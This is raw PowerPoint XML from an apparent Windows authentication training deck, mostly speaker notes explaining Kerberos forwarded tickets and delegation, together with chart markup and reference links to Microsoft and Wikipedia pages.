      </c:catAx>
      <c:valAx>
        <c:axId val="276127320"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="1"/>
        <c:axPos val="b"/>
        <c:majorGridlines/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="none"/>
        <c:crossAx val="328451816"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
    </c:legend>
    <c:plotVisOnly val="1"/>
    <c:dispBlanksAs val="gap"/>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BC1530C-FD02-4C39-9B74-6BF7AF53B916}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>3/08/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"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E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="755903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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/8df64cd9-a480-472a-8087-6a5e78f18e49#domain" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/cc236648.aspx" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/cc236653.aspx" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide149.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/cc236651.aspx" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/cc236689.aspx" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/780943e9-42e6-4dbe-aa87-1dce828ba82a#Challenge" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/cc236673.aspx" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/cc236649.aspx" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/54af12e1-fcc1-4d62-bd47-c80514ac2615#session_key"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technet.microsoft.com/en-us/library/cc778264(v=ws.10).aspx"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technet.microsoft.com/en-us/library/cc772815(v=ws.10).aspx" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://technet.microsoft.com/en-us/library/cc773061(v=ws.10).aspx" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://technet.microsoft.com/en-us/library/cc779926(v=ws.10).aspx" TargetMode="Externa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go.microsoft.com/fwlink/?linkid=23186"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technet.microsoft.com/en-us/library/cc758849(WS.10).aspx"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upport.microsoft.com/default.aspx?scid=kb;EN-US;274064"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upport.microsoft.com/default.aspx?scid=kb;EN-US;274064"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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/LM_hash#cite_note-4" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/LM_hash#cite_note-1" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Code_page" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/LM_hash#cite_note-6" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide88.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Uppercase" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/ASCII" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/LM_hash#cite_note-3" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Data_Encryption_Standard" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/LM_hash#cite_note-davenport-2" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/LM_hash#cite_note-KB828861-5" TargetMode="Externa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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/cc223948.aspx" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/33b94545-9ae1-4cc8-9ce5-4be893b7bec3#nonce" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/cc223986.aspx" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide90.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/8df64cd9-a480-472a-8087-6a5e78f18e49#domain_controller" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/780943e9-42e6-4dbe-aa87-1dce828ba82a#Challenge" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/8df64cd9-a480-472a-8087-6a5e78f18e49#domain" TargetMode="Externa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technet.microsoft.com/en-us/library/cc772815(v=ws.10).aspx"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technet.microsoft.com/en-us/library/cc772815(v=ws.10).aspx"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CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3879474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45442313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100</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="341115242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101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167323664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CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>102</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9939428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pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>What are forwarded tickets?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Forwardable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> TGTs obtained from a client that enable the service to impersonate the client are called forwarded tickets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>If a client wants to delegate the task of obtaining tickets for back-end servers to a front-end server, it must ask the KDC for a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>forwardable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> TGT. It does this through an AS exchange, indicating to the KDC the name of the server that will act on the client's behalf. If Kerberos policy permits forwarding, the KDC creates a TGT for the front-end server to use in the client's name, sets the FORWARDABLE flag, and sends the TGT back to the client. The client </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>then forwards the TGT to the front-end server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200"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When the front-end server requests a ticket to the back-end server, it presents the client's TGT to the KDC. When the KDC issues a ticket, it sees the FORWARDABLE flag in the TGT, sets the FORWARDED flag in the ticket, and returns the ticket to the front-end server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>How the client's TGT and TGS session key are sent to front-end services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Proxy is limited in that the client must have information about the target server's name. Forwarding relieves the client of this burden. Rather than ask the KDC for a service ticket specifically for the server, the client sends its TGT—with the FORWARDED flag set—and TGS session key to the delegate server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200"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When the delegate server has the client's forwarded TGT and TGS session key, it can request from the KDC directly any service tickets it needs for any additional servers or services. The client does not need to be involved. With the client's forwarded TGT, the delegate server can fully impersonate the client, and can request service tickets on the client's behalf and in the client's security context for any services.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="1" i="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The Forwarded Ticket and Delegation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>In Windows 2000, Windows XP, and Windows Server 2003, Kerberos delegation allows a service running under the local system security context to take on the client's identity and authenticate as the client to another service.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A server that has a client's forwarded ticket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> the client. Thus, the forwarded ticket enables the server to request new tickets from the TGS. Because a TGT is required to request new tickets, the forwarded ticket is the client's TGT. Then, when a client forwards its TGT to another server, the client is said to have delegated its identity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200"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There are two forwarding situations:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The client delegates its identity to a service that logged on with its own credentials, has its own user account, and knows its own password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The client delegates its identity to a service that was started in a user context, is using that user's credentials, but did not log on and does not have information about the user's password (for example, DCOM's "activate as activator"). This situation requires a special authentication mode called user-to-user authentication, which is discussed in the next section.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="1200"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The normal message sequence for a forwarded ticket is illustrated above.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The client requests a TGT with valid addresses for the client and the delegate. The TGT is requested as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>forwardable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The KDC sends a TGT with valid addresses for the client and the delegate. The TGT is flagged as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>forwardable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The client uses the TGT to request service ticket for the delegate server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The KDC sends a service ticket for the delegate server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The client uses the service ticket to connect to the delegate server and requests mutual authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The client authenticates the delegate server. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>If the authenticator passes the test, the service looks for a mutual authentication flag in the client's request. If the flag is set, the service uses the session key to encrypt the time from the user's authenticator and returns the result in a Kerberos application reply (KRB_AP_REP). If no mutual authentication flag is set, then no response is needed. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Up to this point, the messages are the same as a normal client-server authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>After the user is authenticated and authorized, the client sends the delegate server its TGT and a session key to be used in messages to the TGS. The KRB_CRED message is used to deliver the TGT and session key. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The delegate server now has the user's TGT and the correct session key for the user/TGS session; so Delegate can now request tickets to other resources in the user's name. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The delegate server requests and receives a service ticket for Server from the KDC. In the request, the delegate server sends the user's TGT and an authenticator encrypted with the user/TGS session key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
